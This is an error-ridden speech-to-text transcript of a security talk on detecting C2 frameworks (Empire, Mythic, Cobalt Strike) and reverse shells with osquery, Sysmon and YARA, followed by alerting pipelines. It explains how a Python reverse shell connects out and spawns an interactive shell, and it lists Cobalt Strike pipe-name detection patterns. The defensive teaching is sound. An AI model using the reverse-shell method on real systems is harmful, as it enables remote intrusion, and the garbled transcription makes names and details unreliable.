 Hello, everyone, and welcome to my talk, Yeet to Lead with a Whiskery, Effective Threat Hending Without Breaking Bank. Let me first start by introducing myself. Who am I? My name is Sebastian Pravas. I'm a lead security engineer at a company called Beacon. And I've also experienced building the secure operations function for a financial tech company. In my free time, I like to dabble around with tools and resources with information security. I like to travel the world and I like to go to the gym. Sometimes after half day of work to clear my mind. Now, let me first explain a little bit what my motivation is with my top processes for this talk. Why I'm doing this talk. So nowadays, at present, we have lots of EDR, MDR, and XDR solutions who are seen as the one-stop solution for security. They are seen as the answer for security, especially endpoints and devices. Because they are seen as the solution, lots of companies, they want to compete. So there are also lots of companies representing their own solution. Some of the more known ones are Falco from CrowdStrike, Singularity from Sentinel-1, you have Carbon Black from VMware, and so on and so on. Because they are seen as the one-stop solution for security, they're sometimes quite expensive. They're quite pricey. But that doesn't bother people. That doesn't bother companies. Because people and companies, they want to stay safe. And they think, oh, it's one-stop solution for security. We'll mind paying for that. But sometimes these solutions, they still miss common techniques and payloads. They still miss some basic items, basic elements that might slip through the nets, and that will give a foothold for potentially malicious actors or red teams. Now, my talk is not to say this in a bat, no, not at all. They're actually quite good. My talk is just to show how obisquery can potentially help the solutions, how obisquery can complement those solutions. So basically, to improve security on endpoints and devices, let's make the solutions and obisquery work next to each other. Let's make them complement each other to keep everyone as secure as possible. So what can you expect from my talk? First, I'll introduce you to obisquery. What is it? Who made it? And what are its capabilities? Then I'll go over a few command and control frameworks and the payloads, how it's set them up, and what they provide. Why am I doing this? Because some of them, I might use a little bit of an example for down the talk as well. When we pass that, I'll also show how you can catch reverse shells. And right before that, I'll also show you how obisquery can be used to actually catch those command and control frameworks. And now that it's done, I'll also show you how you can create alerting pipelines from when events happening in obisquery find something, all the way to alerting your security operations team so they can intervene whenever it's necessary. Because of course, if something's happening, you want your security operations team to be able to intervene or to see if it's a false policy or not. Now that it's done, I'll quickly give a quick city trip of what we've seen around the entire talk. Let me first start by introducing to obisquery. What is obisquery? Obisquery is an operations, operating system instrumentation framework that mainly supports Windows, MacOS, Linux, FreeBSD. You can potentially support auto-based systems as well, but you would have to compile themselves. For those, the four I've mentioned, there are pre-built packages that can be done on official sites. Originally, obisquery was made by Facebook. It was made by Facebook because they want to have an easy way to have an insight on the overall state of the infrastructure. Nowadays, it's maintained by a separate foundation that started by Facebook and the next foundation together to be able to maintain the growing obisquery ecosystem. That foundation that maintains the ecosystem employs mobile developers from Facebook, Google, Coli, Optics, you name some companies that use obisquery and they might have a few commits in the core as well. So the big companies that still use obisquery nowadays are Netflix, Uber, Airbnb, and Facebook, of course, and quite a few others. Now, how does this work? How does obisquery actually works? So basically the operating system is exposed as a relational database with obisquery. You can use SQL queries to explore the operating system. You have tables, the most of the tables represent the state of different parts. For example, you have the process lift, you have running processes. You want to have, you want to ask the state from a certain process with obisquery. You can also ask what states are module modules which are loaded, which are not loaded, or another example, the start command in Linux, you feel that that moment state of file, the access time, the creation time, modify time, permissions. You can do the same thing by using the SQL query in obisquery. Now, there are two different kinds of tables. You have event-driven tables and tables that purely show states. What I said before, the state tables are tables that show the state of that point, the snapshot of that point of what you're asking for. For example, the files, the processes, or installed extensions, or browser extensions, for example. Now, you have also event-driven tables. Those tables, they have their data as being pushed by outending APIs. For example, file events. Example, let's say a copy of file directory, that's an event. That event will get pushed to the file events table in obisquery. There are multiple tables like that. You have file events, you have process events, that, for example, a process just executes a command or moves the file around to some of that. That shouldn't be shown in a process events table. You're basically listening to events on different levels of operating system. Now, Windows, you can make obisquery even more powerful by kind of linking it with Sysmon. That will go deeper in that later because this will be very useful to catch certain elements. Now, I would like to show a few examples of obisquery, how it actually works. My first example is around file information. Like I've mentioned before, you can ask the state of the file with a simple SQL query. Now, as you can see on the slides, I have an example for Windows and Linux. The query basically asks for the path, the directory, the file name, the iNote, type in a user ID from a file. The certain directory and the file name has to start with the word DEFCON, Windows. Now, you can see it defines everything, but no user ID because the user ID field is already filled in in Emix and MacOS, but never on Windows. As you can see on the I asked for the same information, just a different path and different file name. And you can see the user ID field is now not zero, but a certain number, which is a user ID that owns the file. Now, this is quite a simple example. Let's go to the next example. The next example is around listening boards. You can, with a simple SQL query, also say, okay, I wanna see every process or I wanna see every all information of the process that listens on a certain part of processes that start with a certain name or certain word that is in the name of the process. Now, with this query, I'm looking for the address, the port and the path or processes listening on certain ports, but the process name has to contain the word OS query or Splunk. And you can, as you can see, can use even in a Jones in OS query. This is simple in a join based on this field. That's the same one on both tables. Now, in Windows, we have the result of there's a Splunk process running, listening on port 8089. Now, Linux will see that it finds, again, a Splunk process listening to certain ports. However, it also finds a socket file because in Linux, you can also, if you query listening ports, you can also see socket files and OS query listen to a socket file for some communication between processes. So this basically shows you how you can combine two tables to gather information you would like to have. Well, my third example is quite useful to show as well. In Windows and Linux, you can query for pipes, name pipes, anonymous pipes, open pipes. Now, as we all know in Windows, certain families of malware or control frameworks, the agents of stages that use named or anonymous pipes to communicate with maybe sacrificial processes or with some other part of their code or whatever. So as an example of Windows, I basically said, give you all information from the table pipes where the name contains my first name, Sebastian, and it gives me three pipes. As we can see that the three pipes with my name still open, still running. And apparently Microsoft Teams has pipes with my first naming of a level use Microsoft Teams. This is on Windows 11 preview, so maybe that's why at this moment I should figure out even more. Now, on Linux, there's a small difference between Linux and Windows because on Linux you can only query open pipes, but you will never have their names. You will have the process that it might belong to, the inodes, the modes, the file descriptor, and sometimes all the fields are filled in as well. That's basically it, what you will see in Linux. So they might have to use some joints together. That's some more information. But this example shows you, how easy is this to also look very for open pipes, easy is to get that information but be useful in the long run. Now, let's head to the second step. Comment and control frameworks and have payloads. So in this part, I will go over one or two comment and control frameworks and the types of payloads. And afterwards, how you can potentially catch them. Why am I showing this comment control frameworks and payloads because I would like to use them as a little bit of an example on how you might be able to catch them with OS query. What are comment control frameworks exactly? You can also be seen as post exploitation frameworks. They are mostly used by your bad actors or bad teams after they initially exploited the system of the victim that they want to exploit. They need some sort of breach, they need something that allows them from outside to get back on the computer without having to exploit the system again. So that's why they sometimes use comment control frameworks. Now, these frameworks, they provide accessible ways for privilege escalation, comment execution, pivoting and lateral movements and so on and so on. They have lots of multiple functionalities. They can also be used on multiple operating systems, Linux, Mac OS, Windows, Unimit and it's probably at least one comment control framework that has some functionality to use on that operating system. A few of them were known ones are Empire, Mythic, Cobalt Strike, as everyone knows and you have few others like Galdera, you have Shadow and so on and so on. Now, the first one I'll talk about is Empire. The Empire C2 framework, it has like a metasploit like comment line interface. There's also user interface for it called Starkiller but in this example, I will only show quickly how the comment line interface looks like. It's a little bit like Metasploit. It has outcompletion and quite easy to use. Originally, this was a comment control framework with PowerShell for Windows, that's more like pure PowerShell, but further down the road, it's also gained capabilities for Linux and OS X with Python 3. How can you deploy Empire? You can deploy it using Docker, you can use Galileo Linux or you can do it manually, however you like it. My example, I quickly explain how you can deploy it with Docker. So, first you pull the Docker image. When that's done, then you can create a persistent storage that even when you shut down the Docker instance, the storage with potentially payloads and stages is still there. When that's done, you can run basically the Docker image that you pulled in the beginning with the persistent storage and it will start up the Docker container for Empire. And when it's running perfectly, you can see on the slides, what the interface will look like. Now, Empire has multiple different stages. So, look at agent stages. Why just stages? Because they are quite small and when you have a stage executed on the target device, then you can send commands to that stager that is commands in code code that will come from your Empire control server, basically. Some of the stages are shell codes, some are done with dynamically linked libraries, you can g-files, macros, and name it. On the screenshot, you can also see the different kinds of stages that Empire has, most of them are Windows and macOS. The multiple ones, some of them also work in Linux. Now, the second framework I would like to talk about is the Mythic Framework. Mythic Framework is a cross-platform command control framework. You can basically run it on almost anything, just like Empire, because it runs in the Kubernetes Docker container. It's basically, it's a bit different than Empire. Empire provides already all the stages. With Mythic, it's a play-in-play architecture. You can say, you can start with Mythic, it won't contain anything, but you can along the way add more agents or profiles. How do you deploy it? Again, we just docker. The web interface, database, the backend, everything runs in a separate doc container. That's what makes it so modular and play-in-play architecture. Now, how do you install this one? The first one, this one repository. Then it has an install script that basically sets up all the contents you need, from the database, the queues, listeners, for web interface, everything. And then you can use its own command line interface to start entire framework. As a result, you get a nicely pre-built user interface. It's actually quite easy to use. In my opinion, a bit easier than Empire. That's everyone to their own, of course. Now, as I said before, Mythic has a play-in-play architecture. What I mean with this? So when you install Mythic, you don't have any pre-built agents that are delivered with Mythic. Nowadays, you can find those agents in the separate git repositories where you can install them from. You have agents written in just before automation, which is from macOS, in GoLine, Python, csharp.naps. That's quite easy to install. As an example, I'm showing you how you can install an agent or a profile. For example, I want to install the Apple agent, which is an agent that is usable for macOS. I just have to use the command line again and provide the hit-up link to the repository of that agent. I can do this and it just works. The same with profile. I want, of course, go into control profile as well for HTTP or HTTPS or DNS or something else. All the different profiles are listed in their own personal git repositories and you just install them by using the command line again. Now, what's also useful about those agents is that the functionality they're built in, they're not just stages. The stages, they're actually agents. For example, the Apple agent already contains functionality to take screenshots or to do some other functionality that's maybe not in all other stages but also other frameworks. For example, the Apple agent from Bittic also contains functionality to take screenshots or to try to elevate your permissions or to do certain injections of that. Now, shall we delete? So now I would like to show you how you can potentially use OS query to catch certain things from those frameworks or other frameworks. So there are multiple ways to use OS query. There are multiple ways that you can use OS query to catch IOCs, indications of compromise. What is YARA rules, integrity monitoring, your process events. You can easily combine OS query with Sysmon to catch certain IOCs based on events provided at Sysmon. As discussed before, I'll show you how to do Sysmon as well because this creates something quite powerful. I also show you how you can catch reversal connections with OS query as well. Let's start with YARA rules. What is YARA? Actually, YARA is a wave identifying malware or other files where processes with rulesets. The limitation of OS query is with file integrity monitoring. What basically means is I can map a directory to a certain YARA rule sets. And then when a file gets moved into that directory or created or copied, it will trigger YARA rule that YARA will scan that file. And if the rule matches the file or the file matches the rule, then it will create an event that can be potentially seen as an indicator of compromise. Now during my investigation for this talk, I found out that specifically to move to file action was not covered by this. This was specifically missing only for the YARA events implementation OS query. So basically, if in Linux or macOS, you would use the move command and V command, move around files, it would never trigger the rule because OS query wouldn't see that if you wanted to scan those files with YARA. So I made a pull request to the OS query core to fix this. So it would also trigger move to file actions. Now this has been accepted last night and should arrive in the next version of the query as well to for even better protection with the YARA rules. Now you could also say, why not move from file actions? Well, move from file actions, that means that you move file away from the directory you're monitoring. So since only one scan files in a directory, it makes the sense to also cover the move from. Now let's now show you an example of how a YARA rule configuration looks like and what potentially can do and how it looks like as a result. So here, a very, very small rule that basically I've written as an example for stock and basically should detect Empire Windows shellcode stature for 64-bit systems. I referred, and as reference, I used the hit the link to Empire command to control framework. And basically says if the two strings you see on screen are seen in the file, YARA, then it will trigger an event because that means that the file matches the YARA rule. The first string is mini Empire DLL that's always in those 64-bit Windows shellcode statures. And the second is series of characters that can be seen with an hex editor. So if both strings are present in the file, it will trigger a rule and create an event. What does it look like as a result? So as example, I basically copy to the stature file to Linux system to show there and you use the directory home shadow, you monitor that with YARA events. And the moment I copy Empire and score different Bing file into that directory, the moment I copy the YARA implementation, you will scan that file. When we scan it fast, it will trigger the rule because it matches the strings in the rule. And as a result, you can look at the table called YARA and score events and you can see that certainly in the directory, our file appears and then was updated that matches that rule. And then like that, we have defense. Now, this then can be shown later on with alerting to other people or to your secure privacy team because then they see there's suspicious file, maybe we should do something about it. If you don't use YARA rules, you might miss out on certain files from certain control frameworks. However, most of the control frameworks don't have YARA rules defined for them. So you would potentially explain themselves or maybe someone else can do that. I created rules to give you an example on how you can use the powerful function of YARA to monitor directory and files. The next file I wanna talk about, the next function in OBS query I wanna talk about is file integrity monitoring. How could file integrity monitoring potentially be used to monitor for suspicious files? File integrity monitoring monitors directory for file changes. We can do it on one level or even recursive. It can be used to monitor sensitive directories. For example, on Mac OS, you have the launched agent directory, launched demons directory, or on Linux, for example, for slash ATC or use the lib directory, for example. But this file integrity monitoring also monitors on the moved to file action or moved from. Not just update, create, or modify because the implementation of file integrity monitoring with YARA rules is different than actual file integrity monitoring for OBS query in general. Now, this is a simple example to show you how you could configure with OBS query which directories it should look at. As you can see here, I'm telling my OBS query on my look to check different directories, the temp folder, no workspace folder, which contains most of my source code and stuff. Let me make sure nothing weird happens that I don't know about or the launch agent, for example. As you can see the last part, the state's users and then a percentage sign. Basically means I wanna in the users folder for every other user, I wanna monitor the last agent's directory. Now, what does it actually look like if a file enters one of those directories? As you saw the last part in my configuration, I was monitoring for every user, the last agent directory, every single user. So what I did was I used the mithic framework to generate an actual payload and then I execute that on the MacBook and then from my command control server, I set great enable persistence on my victim, my MacBook. And for persistence, it creates a launch agent that for this time I called, I called com.devcom.cf.h2p this, which was placed in a large agent folder for my own personal user. And because I was monitoring that, OBS queries saw this. But even with this, this event can be reported to, excuse me, someone like Spline, to elastic search, and then maybe a secure operations team can look at it and say, hey, there's a suspicious file that appeared here that I don't know about. We should investigate this. Now the next example is process events. OBS query also contains, has the capability to monitor process events. It can monitor process execution. It can monitor execution from parent process or from a child process and then still see what the parent process is, which can be quite useful. Or for example, it can, for example, monitor for OBS, this MacBook for example, or PowerShell execution on Windows or on Linux, let's say on command line execution of Python or something else. Two examples I could come up with was hidden lotus and lame buyer. There was two more families from Mac. Why is the example? Because in the complete process tree, both of them use OBS script to execute certain actions. So if you monitor for authorized OBS script execution, you might have got these two families if you were infected with those two families. Now, what does this look like? Basically, I tell OBS query every 60 seconds, giving all information from process events where the command line contains the word OSA, because OSA is the first two letters from OSA script, which is the command to execute OSA script execution. And when the moment OBS query finds something, it will look like a result you see on the screen. Now, as we've seen before, with file-integry monitoring, I execute malicious payloads and then gain persistence. The command line script you see here was the first step. So first, I had to download the payload somewhere, which I did with OSA script and then executed it. And as you see, OBS query got this from me, and all the information can then again be sent to Sploing, Elasticsearch, or anything else that will allow you to intervene if necessary or at least as a device and then investigate how far they got before you got to the device. We can also be used to monitor, for example, power execution of Python or with commands, or, for example, normal user wouldn't necessarily decode basic C4 strings, stuff like that. It can be used quite a lot of things, but you have to be aware that you don't use too much commands at the same time because you don't want to hook too much resource in the device. Even though this is quite powerful, you can even combine some queries so that you don't have too many queries running at the same time. Another example I would like to show you that's actually quite powerful, but I talked about before, is always combined with Sysmon. Now, you're wondering why this is so powerful. So as you all know, Sysmon locks the amount of system activity. It stays active across reboots because it also is devised an event driver. Now, what kind of functionality can, or what kind of events can Sysmon monitor for? Process injection, create pipe, and quite a lot of other things. Now, I talked to a friend earlier and I told him, yeah, combination of SQL and Sysmon, I can catch process injection. However, it doesn't contain user APC calls. Sometimes process injection, you use create remote threats as functionality for that. User APC calls basically abuses already existing threats. We just create new ones and Sysmon cannot see that yet. Now, how would you tie in Sysmon with Ovisquery? Sysmon saves all its events in the Windows event block under the channel Microsoft Securities Sysmon forward slash operational. Now, Ovisquery can tap into the Windows events channel and can tap in that specific channel. So every time there's no event in there, it will also appear in Ovisquery. And Ovisquery can parse that Sysmon event data and then can create an event out of it and send to Slog again to ask search or something else. Now, how to set up Sysmon to work with Ovisquery? Now, there used to be a very good standard config Sysmon made by Swift on security. But nowadays, someone forgets and approves some pull requests and made even better the hit the repository you can see on the screen. Now, to enable Ovisquery to be able to monitor the channel for Windows events that contain all Sysmon events, you just add the flag to the command line or to a flag file. You restart Ovisquery and it can do that. And then as we see before with all those examples, we can let's say run a query in 60 seconds that looks at Windows events table and they say on all events that don't have event ID 10. For example, event ID 17 is create pipe, event ID 18 is connect pipe, event ID 23 is DNS events, not mistaken. These are example of create pipe. So as most of us know, Cobalt Strike. Cobalt Strike is used file by redeeming of her adversarial emulation, but now this also is by the bad guys because it's quite easy to use and quite powerful as well. Cobalt Strike uses pipes, name and name for communication between the main beacon and sacrificial processes. An example is a pipe with default value, MSSE dash number dash server that's used to run the shell code. Now, you would say that's default value. Yeah, not everyone changes default values of the names of the pipes. So these rules for Sisman or this event, what is events in Sisman, but most of the time still containing default names. Some of us people might change the names, but then you have to find more creative way to still get those pipes. Now, so I basically infected myself with Cobalt Strike beacon and then from my content control laptop of my team server, I set to make, I create the beacon, I secure it on my Windows device, connect back to my control. And as you see, it's spawned from me, a name pipe called MSSE dash 7000, the server as you can see in the screenshots. This gets called by Sisman, which you'll see it as well. And again, we can send these to spline classic search and then you can imagine another example that I want to show you that can get called by Sisman is process injection. For this, I infected another device with the Apollo medic agents. It chooses project injection, the process injection to execute certain tasks. For example, in here, I set take a screenshot for me and inject yourself in the process toolbox.exe, which is a tool from JetBrains to maintain multiple IDs. As a result, as you can see on the screen, again, obisqueria picked it up and told me technique T1055 and the name is project injection. It tells me what tool is used to use the project injection in, so the correction. It shows me, it tells me also what process it's trying to inject code and so on. So even in these events, we can either now obisqueria sent straight to spline classic search or something else and then alert this again. Now, I really want to talk about reverse cells as well. Now, reverse cells, they're quite common because sometimes you have bad teams or bad guys who would like connection from a device back to one-on-server. What are the reverse cells used for? Session established from the victim to the attacker. Some of this is a solution when the victim's device is not directly reachable. Maybe it's behind nuts or something else. But if you initially infect the victim but you can't directly disconnect to it, you need a reverse cell. So you can open reverse cell and send it straight back. Now, most of the reverse cells are without TTY. TTY basically allow you to enhance the functionality of the shell you have. Reverse cells can be launched in multiple different ways. For example, Netcat, Python, Burl, Bash. Most languages can spawn in reverse cell in their own way. I saw a few examples and off to ask you how we can catch them as well. So these are three examples. Python and Burl, almost the same, just a different language. Almost the same. The Bash is quite more simple. All of those three, there's only one that will give you a shell with TTY, which is the Bash version. Because you can only, if you're mistaken, you can only get TTY if the parent process has TTY as well. So if it's one spawn in reverse cell, only if the parent process has already TTY, you can use enhance functionality in your shell. Now, let's quickly analyze how, for example, Python would launch in reverse cell. Now, it has no X to TTY because the parent process, Python itself, doesn't have any connection to TTY. It spawns in reverse cell, so it's going to import 1111 to appears 10.0.0.123. And we want all input, output, and errors sent straight to the socket file descriptor, to our reverse, to our reverse cell, back at the monogonal servers, not to the victim. So the victim might see that something's going on. So it's redirects all the STD out, STD, STDR, to the file descriptor and close the original ones and then spawns the shell with been dashed. Now, of course, with the Westquare, you want to be able to catch those things. So this is quite a large query that combines onto three tables. Processes, process of the circuits and process of the files. Which is in TTY query, we can see if it's potentially a shell running, that's where post of the files process ID is zero and that has in the name either SH or bash. Now, because the shell actually with Python will spawn a reverse shell that will be called by this, actually result of course. This is the result. We see that it spawns a reverse shell to appears 51, 210 and so on, on port 1111. And we can see that the command line is been SH dash I. And we can see in the current command line is an entire reverse shell with Python that we execute it. Now, I would like to mention as well, this was a test on Mac OS. The first also quite, they depend on the operating system, how it operates and what they're connected to and how they look like. So you might have to find two of these queries for other operating systems. In the case, there might be a little difference on Windows again. This is just an example of how you can catch a reverse shell on Mac OS. Now, let's go to the final piece of my talk, alerting. Now, we've seen how command and control frameworks are used, how they work. We've seen how the Wiskery works. We've seen multiple ways how we can catch certain elements from frameworks and certain IOCs between Wiskery, gyro rules, things like monitoring, seismic, you can catch reverse shells if you find the requeries and so on and so on. But we also want to monitor everything and make sure that you can alert it. So alerting should be the next step. So you have an event now that has been detected. What's next? So the detection is only a small part. You want to empower your security, you want to make sure that they know what's happening so they can intervene as soon as possible. I have two small examples with Splunk in our search to show you. So this is a small pipeline, all of the pipeline with Splunk, four elements. So we have on endpoints, OS Query running and all the ICS-C is the icon of a Splunk forwarder, universe forwarder, which is the most lightweight forwarder they have. OS Query basically sends all the scheduled queries it does constantly to a log file. The universal forwarder monitors that file. If you know item it sees, if it has a rule set itself, it will send it to Splunk instance. Now Splunk instance will gather all the data and in Splunk instance, we can create some alerts. Let's say I want alert on false injection or paid five, then Splunk can send an alert to Slack of page duty. What does it look like you say? This is a small example on how this might look like. For example, on the UF, the OS Query output of an event that Sysmon potentially saw possible cobalt strike post exploitation jobs. How did it start? Because it saw a pipe name that looked like a cobalt strike pipe name. Post X, score and then for random characters. This is default pipe name that cobalt strike uses for post exploitation jobs. So OS Query between universal forwarder sends this data to Splunk. And it's, you can see that there is an alert created, generated on Splunk that will alert in real time, if it gets an event that has certain conditions. And to the right, onto the last part, you can see what it looks like in Slack. So this is from OS Query to alert in Splunk that will trigger, that will send a message to Slack. And on the Slack message, you can see potential cobalt strike named pipe detectives where it was detected, which technique was technique name, pipe name, the image potential file version, if there's any file version and the link to a specific event of the alert. Now, the next pipeline would like to show you is with ALK stack. Basically, we could say elastic in Kibana because I don't use those types in this sense. Here we use OS Query combination with file bits and again, OS Query has scheduled queries that puts data in a log file. File bit will monitor a log file and sends the data it needs to Alaska search. Alaska search contains all the data and the Kibana has a learning functionality that can, for example, send the data to Slack, the page join me, anything else we can imagine. Now, what does this look like? So, again, we have an event and this time I took an event that was triggered on a YARO rule. So again, Empire of Dispwn shellcode stager, there is a YARO rule and we see it was triggered in a home directory and which YARO will match with Empire of Winch shellcode. And you have two strings. Now, it sends a data like a search and it makes you can see that I create a rule that would trigger on these events. Now, that rule, when it sees an event, at least one event or more, it will send an alert to page a duty that you can see that then maybe sends a message to my Slack or to my cell phone or anything else to tell me a YARO is triggered, maybe this should be investigated. Of course, it can be used, for example, the trigger operations teams or on call. Example, they get a message on the phone, they get a phone call that when a system tells them something happened, these alerts, these investigates and you can acknowledge, resolve, or anything else. Now, we've seen already now, we've seen that we've even event with query can be sent to Splunk, for example, and to Slack or to page duty to do alerting on certain events that were found by seismic, by obscurity, apologies. But there is a next step as well. What is next? Maybe SOAR, SOAR stands for Security Orchestration, Automation and Response. Now, there are different solutions. For example, your Phantom, that's blank of Cortex XOR by Palo Alto with Alien Vault, USM, and so on. Now, what is the advantage of SOAR, actually, basically, they allow you to automate tedious tasks or tasks that normally your security operations team does? As an example, for example, Phantom with the playbooks. Let's say every event that obituary sees of file on a system that's trigger-yarrowable. It sends data to Splunk. Splunk sees this, it sends alerts to Slack. At the same time, also there's a playbook in Phantom. Now Phantom, you can say, oh, interesting. It sees what host is on. If Phantom can potentially connect to that host, get out of file and detonate it and very slow to see what the file actually does, if it actually is. And if it sees, oh, this is a bad file, it can maybe react and automatically contain the device that file was found on or alert security, this is really dangerous. The security team didn't have the chance to react yet. SOAR platforms can be used to improve the quality of life for security operations teams to prevent alert fatigue. But some of the security operations teams get so many alerts that they are, they can dive to alerts and there is a huge backlog. So SOAR platforms can help here to make the backlog smaller and already certain tasks that security operations teams don't have the energy for or the capacity for. So I think SOAR platforms are really good use and could potentially help these teams a lot. Now, this was my, so what do we have seen in the backlog today? What is it doing? What is it whispering? And what is it made for? How does it work? What does it do? Afterwards, we've seen how control frameworks, some of them can be set up, which ones exist and how the payloads might work. We've also seen how we can catch IOCs create bioscreen works. They've quickly seen how your first cells can be spawned and how we can catch those refresh cells as well. But I've also went over how you can set up certain alerting pipelines, how they should work on to alert certain events that whiskery or system has seen. And in the end, I quickly went over how SOAR platform can improve the quality of life for skill operations teams. These are some of the resources I used. I put them here on the slide because I also believe in attribution or credit where credit is due. I would like to thank you all for listening to my talk. I hope you learned something. And if you would like to chat with me, you can find me on the internet somewhere or find me in the speaker channel on this call as well. Thank you all and see you next time. These are also my contact details. I would like to talk to you.